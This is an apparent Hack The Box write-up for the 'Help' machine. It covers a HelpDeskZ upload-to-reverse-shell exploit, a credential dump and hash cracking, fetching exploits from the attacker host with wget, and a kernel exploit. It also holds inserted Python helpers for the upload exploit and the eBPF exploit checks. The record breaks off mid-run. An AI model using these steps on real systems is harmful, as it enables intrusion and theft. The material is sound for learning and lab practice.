{"id":1554,"date":"2021-09-12T19:09:10","date_gmt":"2021-09-12T19:09:10","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1554"},"modified":"2021-09-12T19:09:10","modified_gmt":"2021-09-12T19:09:10","slug":"help","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/help\/","title":{"rendered":"Help"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/170\" title=\"Help\">Help<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/2f6225d90a3caf56699c3d93e8779d6b.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code class=\"language-sh\">PORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)\n|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)\n|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n3000\/tcp open  http    Node.js Express framework\n|_http-title: Site doesn&#039;t have a title (application\/json; charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>I did not find anything on port 3000 (it only answers with JSON), so I focused on port 80, which serves nothing but the Apache default page. 
A gobuster scan gave the following results.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/Help]\n\u2514\u2500# gobuster dir --add-slash --expanded --follow-redirect --url http:\/\/10.10.10.121\/ --no-error -t 50 --extensions php,txt,html --wordlist \/usr\/share\/wordlists\/dirb\/big.txt| tee gobuster3\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.121\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              php,txt,html\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/09\/12 09:04:47 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.121\/.htpasswd\/           (Status: 403) [Size: 297]\nhttp:\/\/10.10.10.121\/.htpasswd.php        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htpasswd.txt        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htpasswd.html       (Status: 403) [Size: 301]\nhttp:\/\/10.10.10.121\/.htaccess\/           (Status: 403) [Size: 297]\nhttp:\/\/10.10.10.121\/.htaccess.php        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htaccess.txt        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htaccess.html       (Status: 403) [Size: 301]\nhttp:\/\/10.10.10.121\/icons\/               (Status: 403) [Size: 293]\nhttp:\/\/10.10.10.121\/index.html           (Status: 
200) [Size: 11321]\nhttp:\/\/10.10.10.121\/javascript\/          (Status: 403) [Size: 298]  \nhttp:\/\/10.10.10.121\/server-status\/       (Status: 403) [Size: 301]  \nhttp:\/\/10.10.10.121\/support\/             (Status: 200) [Size: 4453] \n<\/code><\/pre>\n<p>An application called <code>HelpDeskZ<\/code> is running at <a href=\"http:\/\/10.10.10.121\/support\/\">http:\/\/10.10.10.121\/support\/<\/a>. There are no default credentials, but searchsploit lists published exploits keyed to the version number:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/Help]\n\u2514\u2500# searchsploit HelpDeskZ                        \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nHelpDeskZ 1.0.2 - Arbitrary File Upload                                                                                                                                                                     | php\/webapps\/40300.py\nHelpDeskZ &lt; 1.0.2 - (Authenticated) SQL Injection \/ Unauthorized File Download                                                                                                                              | 
php\/webapps\/41200.py\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n<p>A second gobuster run turned up <a href=\"http:\/\/10.10.10.121\/support\/readme.htm\">http:\/\/10.10.10.121\/support\/readme.htm<\/a>, which states that the installed version is 1.0.2 (a shipped readme is a version leak worth looking for on any HelpDeskZ install), so the exploits above apply. I could not get the unauthenticated one, the arbitrary file upload, to work at first, so I went looking online.<\/p>\n<pre><code>https:\/\/gist.githubusercontent.com\/dasithsv\/d2b0c8cea39096e19f336f5e29bbf803\/raw\/a6d24e637a9fb3dfb7c6d1598980af2594f6a168\/HelpDeskZ 1.0.2 - Arbitrary File Upload.py<\/code><\/pre>\n<p>Reading the copy of the exploit at that address showed me that I had simply been using the existing exploit wrong. 
The file has to be uploaded to the target first: I uploaded my reverse shell through the ticket form at <a href=\"http:\/\/10.10.10.121\/support\/?v=submit_ticket&amp;action=confirmation\">http:\/\/10.10.10.121\/support\/?v=submit_ticket&action=confirmation<\/a>, then ran the exploit against the uploads directory. The script probes candidate file names with HEAD requests, and the HEAD that hits the right name also executes the PHP, which is what triggers the callback.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Linux\/Help\/exploit]\n\u2514\u2500# python 40300.py http:\/\/10.10.10.121\/support\/uploads\/tickets\/ test.php                                      130 \u2a2f\nHelpdeskz v1.0.2 - Unauthenticated shell upload exploit\n1631455471\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Linux\/Help\/exploit]\n\u2514\u2500# nc -lvp 1234                                                                                                 1 \u2a2f\nlistening on [any] 1234 ...\n10.10.10.121: inverse host lookup failed: Unknown host\nconnect to [10.10.14.18] from (UNKNOWN) [10.10.10.121] 38868\nLinux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\n 07:04:34 up 56 min,  0 users,  load average: 1.15, 1.27, 1.05\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ <\/code><\/pre>\n<p>And I got a reverse shell. Two things in that banner are worth noting for later: the <code>id<\/code> line shows the web shell already running as the help user (uid 1000, with the www-data and adm groups) rather than a dedicated web account, and <code>uname<\/code> shows a 4.4.0-116 kernel built in February 2018. 
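<\/p>
<p>The upload step deserves to be made concrete. HelpDeskZ 1.0.2 stores a ticket attachment under <code>uploads\/tickets\/<\/code> as md5(original filename . time()) with the original extension, and it writes the file even when the form reports that the file type is not allowed. exploit-db's 40300.py simply counts back 300 seconds from the attacker's clock and sends a HEAD request for each candidate name until one answers 200. The following is an added example, not code from the post or from exploit-db: it reproduces that name derivation, but takes the timestamp from the server's HTTP Date header, which is my assumption about the safest way to handle a target whose clock differs from yours. <code>UPLOAD_DIR<\/code> is the directory the post points the exploit at; the function names are mine and the 300-second window mirrors 40300.py.<\/p>

```python
#!/usr/bin/env python3
"""Recover the on-disk name of a HelpDeskZ 1.0.2 ticket attachment.

Added example, not code from the post or from exploit-db 40300.py.
HelpDeskZ stores an attachment as md5(<original filename> . time()) plus
the original extension, where time() is PHP's Unix time on the *server*.
40300.py counts back 300 s from the attacker's clock; here the server
clock is taken from an HTTP Date header instead (my assumption about the
safest way to cope with clock skew between attacker and target).
"""
import hashlib
from email.utils import parsedate_to_datetime
from typing import Callable, Iterator, Optional

# Directory the post points 40300.py at.
UPLOAD_DIR = "http://10.10.10.121/support/uploads/tickets/"
WINDOW = 300  # seconds to search backwards, same as 40300.py


def http_date_to_epoch(date_header: str) -> int:
    """Turn an RFC 7231 Date header ('Sun, 12 Sep 2021 14:04:31 GMT') into
    the Unix timestamp that PHP time() returned on the server at that moment."""
    return int(parsedate_to_datetime(date_header).timestamp())


def stored_name(filename: str, upload_time: int) -> str:
    """Name HelpDeskZ gives the attachment: md5(filename . time()) . ext.
    Same plaintext that 40300.py hashes: fileName + str(timestamp)."""
    ext = filename.rsplit(".", 1)[-1]
    digest = hashlib.md5((filename + str(upload_time)).encode()).hexdigest()
    return f"{digest}.{ext}"


def candidate_names(filename: str, server_now: int, window: int = WINDOW) -> Iterator[str]:
    """Yield every name the file could have if it was uploaded within the
    last `window` seconds of server time, newest first."""
    for delta in range(window):
        yield stored_name(filename, server_now - delta)


def find_upload(filename: str, server_now: int, exists: Callable[[str], bool],
                window: int = WINDOW) -> Optional[str]:
    """Return the first candidate URL for which exists(url) is true.
    `exists` is injected: a HEAD request on a real target, a stub in tests.
    The HEAD that finds the file also executes it, which is what fires the
    reverse shell in the post."""
    for name in candidate_names(filename, server_now, window):
        url = UPLOAD_DIR + name
        if exists(url):
            return url
    return None


if __name__ == "__main__":
    # Live use (not exercised by the offline test): any response from the
    # target carries its clock in the Date header.
    import requests  # assumption: python-requests is installed

    now = http_date_to_epoch(requests.head(UPLOAD_DIR, timeout=5).headers["Date"])
    hit = find_upload("test.php", now,
                      lambda u: requests.head(u, timeout=5).status_code == 200)
    print(hit or "not found in window; upload again and retry")
```

<p>In a live run the <code>__main__<\/code> block reads the Date header from one response of the target and then probes with HEAD requests; because <code>find_upload<\/code> takes the probe as a parameter, the search logic can be exercised offline against a stub.<\/p>
<p>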
Let's read the first flag.<\/p>\n<pre><code class=\"language-sh\">\nhelp@help:\/home$ cd help\ncd help\nhelp@help:\/home\/help$ ls\nls\ntotal 76\ndrwxr-xr-x   7 help help  4096 Jan 11  2019 .\ndrwxr-xr-x   3 root root  4096 Nov 27  2018 ..\n-rw-rw-r--   1 help help   272 Jan 11  2019 .bash_history\n-rw-r--r--   1 help help   220 Nov 27  2018 .bash_logout\n-rw-r--r--   1 root root     1 Nov 27  2018 .bash_profile\n-rw-r--r--   1 help help  3771 Nov 27  2018 .bashrc\ndrwx------   2 help help  4096 Nov 27  2018 .cache\ndrwxr-xr-x   4 help help  4096 Sep 12 06:08 .forever\n-rw-------   1 help help   442 Nov 28  2018 .mysql_history\ndrwxrwxr-x   2 help help  4096 Nov 27  2018 .nano\ndrwxrwxr-x 290 help help 12288 Jan 11  2019 .npm\n-rw-r--r--   1 help help   655 Nov 27  2018 .profile\n-rw-rw-r--   1 help help    66 Nov 28  2018 .selected_editor\n-rw-r--r--   1 help help     0 Nov 27  2018 .sudo_as_admin_successful\n-rw-rw-r--   1 help help   225 Dec 11  2018 .wget-hsts\ndrwxrwxrwx   6 root root  4096 Jan 11  2019 help\n-rw-rw-r--   1 help help   946 Nov 28  2018 npm-debug.log\n-rw-r--r--   1 root root    33 Nov 28  2018 user.txt\nhelp@help:\/home\/help$ cat user.txt\ncat user.txt\nbb8a7b36bdce0c61ccebaa173ef946af\n<\/code><\/pre>\n<p>I then looked around the machine. Here are the findings I thought were interesting. The Node.js application (presumably the Express service on port 3000) runs under <code>forever<\/code> as the help user, out of the help user's home directory:<\/p>\n<pre><code>help        685  0.0  0.2 947668  2992 ?        Ssl  06:08   0:00 \/usr\/bin\/nodejs \/usr\/local\/lib\/node_modules\/forever\/bin\/monitor \/home\/help\/help\/dist\/bundle.js\nhelp        695  0.7  3.7 990444 36928 ?        
Sl   06:08   0:27  _ \/usr\/bin\/nodejs \/home\/help\/help\/dist\/bundle.js\n<\/code><\/pre>\n<pre><code>\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Cron jobs\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#scheduled-cron-jobs\n\/usr\/bin\/crontab\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use &#039;*&#039; in these fields (for &#039;any&#039;).# \n# Notice that tasks will be started based on the cron&#039;s system\n# daemon&#039;s notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n:<\/code><\/pre>\n<pre><code>help@help:\/var\/www\/html\/support$ find \/var\/www\/html\/support -name &quot;*config*&quot; 2&gt;\/dev\/null\n&lt;port$ find \/var\/www\/html\/support -name &quot;*config*&quot; 2&gt;\/dev\/null               \n\/var\/www\/html\/support\/includes\/config.php\nhelp@help:\/var\/www\/html\/support$ cat \/var\/www\/html\/support\/includes\/config.php\n&lt;port$ cat \/var\/www\/html\/support\/includes\/config.php                         \n&lt;?php\n    $config[&#039;Database&#039;][&#039;dbname&#039;] = &#039;support&#039;;\n    $config[&#039;Database&#039;][&#039;tableprefix&#039;] = &#039;&#039;;\n    $config[&#039;Database&#039;][&#039;servername&#039;] = &#039;localhost&#039;;\n    $config[&#039;Database&#039;][&#039;username&#039;] = &#039;root&#039;;\n    $config[&#039;Database&#039;][&#039;password&#039;] = 
&#039;helpme&#039;;\n    $config[&#039;Database&#039;][&#039;type&#039;] = &#039;mysqli&#039;;\n    ?&gt;help@help:\/var\/www\/html\/support$ <\/code><\/pre>\n<p>config.php hands over the MySQL root credentials (root \/ helpme), which is enough to dump the HelpDeskZ users table. The passwords are stored as unsalted SHA-1:<\/p>\n<pre><code>mysql&gt; select * from users;\nselect * from users;\n+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+\n| id | salutation | fullname | email                 | password                                 | timezone         | status |\n+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+\n|  1 |          0 | helpme   | helpme@helpme.com     | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian\/Christmas |      1 |\n|  2 |          0 | xcvxv    | lolololol@yopmail.com | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL             |      1 |\n+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+<\/code><\/pre>\n<p>The helpme hash cracks to:<\/p>\n<pre><code>c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:sha1:godhelpmeplz<\/code><\/pre>\n<p>lse.sh also flagged a mailbox for help:<\/p>\n<pre><code>[*] fst130 Does &#039;help&#039; have mail?.......................................... yes!\n-rw-rw---- 1 help mail 27501 Sep 12 08:35 \/var\/mail\/help<\/code><\/pre>\n<p>And a hard-coded credential object for the same account turned up, this time with a 32-hex-character (MD5-length) password field:<\/p>\n<pre><code>var _user = { username: &#039;helpme@helpme.com&#039;, password: &#039;5d3c93182bb20f07b994a7f617e99cff&#039; };<\/code><\/pre>\n<p>None of these got me anywhere, so I ran linux-exploit-suggester.<\/p>\n<pre><code class=\"language-sh\">help@help:\/tmp$ wget http:\/\/10.10.14.18\/linux-exploit-suggester.sh\nwget http:\/\/10.10.14.18\/linux-exploit-suggester.sh\n--2021-09-12 10:12:06--  http:\/\/10.10.14.18\/linux-exploit-suggester.sh\nConnecting to 10.10.14.18:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 88891 (87K) [text\/x-sh]\nSaving to: &#039;linux-exploit-suggester.sh&#039;\n\nlinux-exploit-sugge 100%[===================&gt;]  86.81K   466KB\/s    in 0.2s    \n\n2021-09-12 10:12:06 (466 KB\/s) - &#039;linux-exploit-suggester.sh&#039; saved [88891\/88891]\n\nhelp@help:\/tmp$ chmod +x linux-exploit-suggester.sh\nchmod +x linux-exploit-suggester.sh\nhelp@help:\/tmp$ \n\nhelp@help:\/tmp$ \n\nhelp@help:\/tmp$ \n\nhelp@help:\/tmp$ .\/linux-exploit-suggester.sh\n.\/linux-exploit-suggester.sh\n\nAvailable information:\n\nKernel version: 4.4.0\nArchitecture: x86_64\nDistribution: ubuntu\nDistribution version: 16.04\nAdditional checks (CONFIG_*, sysctl entries, custom Bash commands): performed\nPackage listing: from current OS\n\nSearching among:\n\n78 kernel space exploits\n48 user space exploits\n\nPossible Exploits:\n\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\n[+] [CVE-2017-16995] eBPF_verifier\n\n   Details: https:\/\/ricklarabee.blogspot.com\/2018\/07\/ebpf-and-analysis-of-get-rekt-linux.html\n   Exposure: highly probable\n   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/45010\n   Comments: CONFIG_BPF_SYSCALL needs to be set &amp;&amp; kernel.unprivileged_bpf_disabled != 1\n\n[+] [CVE-2016-5195] dirtycow\n\n   Details: https:\/\/github.com\/dirtycow\/dirtycow.github.io\/wiki\/VulnerabilityDetails\n   Exposure: highly probable\n   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]\n   Download URL: 
https:\/\/www.exploit-db.com\/download\/40611\n   Comments: For RHEL\/CentOS see exact vulnerable versions here: https:\/\/access.redhat.com\/sites\/default\/files\/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2016-5195] dirtycow 2\n\n   Details: https:\/\/github.com\/dirtycow\/dirtycow.github.io\/wiki\/VulnerabilityDetails\n   Exposure: highly probable\n   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/40839\n   ext-url: https:\/\/www.exploit-db.com\/download\/40847\n   Comments: For RHEL\/CentOS see exact vulnerable versions here: https:\/\/access.redhat.com\/sites\/default\/files\/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2021-3156] sudo Baron Samedit 2\n\n   Details: https:\/\/www.qualys.com\/2021\/01\/26\/cve-2021-3156\/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: probable\n   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10\n   Download URL: https:\/\/codeload.github.com\/worawit\/CVE-2021-3156\/zip\/main\n\n[+] [CVE-2017-7308] af_packet\n\n   Details: https:\/\/googleprojectzero.blogspot.com\/2017\/05\/exploiting-linux-kernel-via-packet.html\n   Exposure: probable\n   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}\n   Download URL: https:\/\/raw.githubusercontent.com\/xairy\/kernel-exploits\/master\/CVE-2017-7308\/poc.c\n   ext-url: https:\/\/raw.githubusercontent.com\/bcoles\/kernel-exploits\/master\/CVE-2017-7308\/poc.c\n   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at &#039;ext-url&#039; adds support for additional kernels\n\n[+] [CVE-2017-6074] dccp\n\n   Details: http:\/\/www.openwall.com\/lists\/oss-security\/2017\/02\/22\/3\n   Exposure: probable\n   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/41458\n   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. 
Includes partial SMEP\/SMAP bypass\n\n[+] [CVE-2017-5899] s-nail-privget\n\n   Details: https:\/\/www.openwall.com\/lists\/oss-security\/2017\/01\/27\/7\n   Exposure: probable\n   Tags: [ ubuntu=16.04 ],manjaro=16.10\n   Download URL: https:\/\/www.openwall.com\/lists\/oss-security\/2017\/01\/27\/7\/1\n   ext-url: https:\/\/raw.githubusercontent.com\/bcoles\/local-exploits\/master\/CVE-2017-5899\/exploit.sh\n   Comments: Distros use own versioning scheme. Manual verification needed.\n\n[+] [CVE-2017-1000112] NETIF_F_UFO\n\n   Details: http:\/\/www.openwall.com\/lists\/oss-security\/2017\/08\/13\/1\n   Exposure: probable\n   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}\n   Download URL: https:\/\/raw.githubusercontent.com\/xairy\/kernel-exploits\/master\/CVE-2017-1000112\/poc.c\n   ext-url: https:\/\/raw.githubusercontent.com\/bcoles\/kernel-exploits\/master\/CVE-2017-1000112\/poc.c\n   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP\/KASLR bypass included. 
Modified version at &#039;ext-url&#039; adds support for additional distros\/kernels\n\n[+] [CVE-2016-8655] chocobo_root\n\n   Details: http:\/\/www.openwall.com\/lists\/oss-security\/2016\/12\/06\/1\n   Exposure: probable\n   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/40871\n   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled\n\n[+] [CVE-2016-4557] double-fdput()\n\n   Details: https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=808\n   Exposure: probable\n   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}\n   Download URL: https:\/\/github.com\/offensive-security\/exploit-database-bin-sploits\/raw\/master\/bin-sploits\/39772.zip\n   Comments: CONFIG_BPF_SYSCALL needs to be set &amp;&amp; kernel.unprivileged_bpf_disabled != 1<\/code><\/pre>\n<pre><code class=\"language-sh\">help@help:\/tmp$ wget http:\/\/10.10.14.18\/cve-2017-16995.c\nwget http:\/\/10.10.14.18\/cve-2017-16995.c\n--2021-09-12 10:57:57--  http:\/\/10.10.14.18\/cve-2017-16995.c\nConnecting to 10.10.14.18:80... connected.\nHTTP request sent, awaiting response... 
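<\/code><\/pre>
<p>Before downloading and compiling the CVE-2017-16995 exploit it pays to verify the two preconditions the suggester prints in its Comments line (CONFIG_BPF_SYSCALL set, kernel.unprivileged_bpf_disabled != 1); note that its Tags line matched the distribution rather than this exact 4.4.0-116 build. The script below is an added example, not part of the post or of linux-exploit-suggester: it reads the sysctl and the kernel config from their usual paths (both overridable, so the parsing can be tested offline) and then attempts the exploit's own first step, creating a BPF map from an unprivileged process, through the bpf(2) syscall. The syscall number 321 is the x86_64 one, which matches this box's uname output; the struct layout and the keys of the result dictionary are mine.<\/p>

```python
#!/usr/bin/env python3
"""Pre-flight checks for CVE-2017-16995 (eBPF verifier) on a Linux target.

Added example, not part of the post or of linux-exploit-suggester. The
suggester's Comments line names the two preconditions; this script checks
them and then tries the exploit's own first step, creating a BPF map as
an unprivileged user, so the answer comes from the running kernel rather
than from a version match.
"""
import ctypes
import os
import platform
from typing import Optional

SYSCTL_PATH = "/proc/sys/kernel/unprivileged_bpf_disabled"  # knob exists since 4.4
BPF_MAP_CREATE = 0        # bpf(2) command
BPF_MAP_TYPE_ARRAY = 2
NR_BPF_X86_64 = 321       # bpf(2) syscall number on x86_64 only


def unprivileged_bpf_allowed(sysctl_text: Optional[str]) -> Optional[bool]:
    """Interpret kernel.unprivileged_bpf_disabled. None: the file is
    missing (kernel predates the knob; inconclusive). True only for "0";
    "1" (and "2" on newer kernels) means bpf() is refused without
    CAP_SYS_ADMIN, so the exploit cannot get started."""
    if sysctl_text is None:
        return None
    return sysctl_text.strip() == "0"


def bpf_syscall_configured(config_text: str) -> bool:
    """True if a kernel .config (e.g. /boot/config-$(uname -r)) builds in
    the bpf() syscall at all."""
    return any(line.strip() == "CONFIG_BPF_SYSCALL=y"
               for line in config_text.splitlines())


def read_or_none(path: str) -> Optional[str]:
    """Read a file, returning None instead of raising when it is absent."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return None


class BpfAttr(ctypes.Structure):
    """Leading fields of union bpf_attr as used by BPF_MAP_CREATE."""
    _fields_ = [("map_type", ctypes.c_uint32), ("key_size", ctypes.c_uint32),
                ("value_size", ctypes.c_uint32), ("max_entries", ctypes.c_uint32),
                ("map_flags", ctypes.c_uint32)]


def try_create_map() -> str:
    """Do what the exploit output calls 'creating bpf map' and report the
    outcome. Only attempted on x86_64 Linux, since the syscall number is
    hard-coded for that ABI."""
    if platform.system() != "Linux" or platform.machine() != "x86_64":
        return "skipped: not x86_64 Linux"
    libc = ctypes.CDLL(None, use_errno=True)
    attr = BpfAttr(BPF_MAP_TYPE_ARRAY, 4, 4, 1, 0)   # one 4-byte slot
    fd = libc.syscall(NR_BPF_X86_64, BPF_MAP_CREATE,
                      ctypes.byref(attr), ctypes.sizeof(attr))
    if fd >= 0:
        os.close(fd)
        return "ok: unprivileged process can create BPF maps"
    return "denied: " + os.strerror(ctypes.get_errno())


def preflight(sysctl_path: str = SYSCTL_PATH,
              config_path: Optional[str] = None) -> dict:
    """Collect the three signals; paths are parameters so tests can point
    them at files they construct."""
    config_path = config_path or f"/boot/config-{platform.release()}"
    cfg = read_or_none(config_path)
    return {
        "kernel": platform.release(),
        "unprivileged_bpf_allowed": unprivileged_bpf_allowed(read_or_none(sysctl_path)),
        "bpf_syscall_configured": None if cfg is None else bpf_syscall_configured(cfg),
        "map_create": try_create_map(),
    }


if __name__ == "__main__":
    for key, value in preflight().items():
        print(f"{key}: {value}")
```

<p>If <code>map_create<\/code> comes back as "denied: Operation not permitted", unprivileged BPF is switched off (or a seccomp filter is in the way) and the eBPF verifier exploit will not work from this shell, whatever the version match says.<\/p>
<pre><code class=\"language-sh\">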
200 OK\nLength: 13728 (13K) [text\/x-csrc]\nSaving to: &#039;cve-2017-16995.c&#039;\n\ncve-2017-16995.c    100%[===================&gt;]  13.41K  --.-KB\/s    in 0.09s   \n\n2021-09-12 10:57:57 (157 KB\/s) - &#039;cve-2017-16995.c&#039; saved [13728\/13728]\n\nhelp@help:\/tmp$ gcc cve-2017-16995.c -o cve-2017-16995\ngcc cve-2017-16995.c -o cve-2017-16995\nhelp@help:\/tmp$ ls\nls\ntotal 1040\ndrwxrwxrwt 10 root root   4096 Sep 12 10:58 .\ndrwxr-xr-x 22 root root   4096 Nov 28  2018 ..\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .ICE-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .Test-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .X11-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .XIM-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .font-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 VMwareDnD\n-rwxrwxrwx  1 help help  18440 Sep 12 10:58 cve-2017-16995\n-rw-rw-rw-  1 help help  13728 Sep 12 10:52 cve-2017-16995.c\n-rwxrwxrwx  1 help help 452509 Aug 26 13:47 linpeas.sh\n-rwxrwxrwx  1 help help  88891 Sep  8 14:58 linux-exploit-suggester.sh\n-rwxrwxrwx  1 help help  41177 Sep  8 14:34 lse.sh\n-rw-rw-rw-  1 help help 200427 Sep 12 07:12 result1\n-rw-rw-rw-  1 help help 193317 Sep 12 08:36 result2\ndrwx------  3 root root   4096 Sep 12 06:08 systemd-private-f9459c97985149de9df4c8fd9c15df9e-systemd-timesyncd.service-Ka57wQ\ndrwx------  2 root root   4096 Sep 12 06:08 vmware-root\nhelp@help:\/tmp$ .\/cve-2017-16995\n.\/cve-2017-16995\n[.] \n[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n[.] \n[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n[.] 
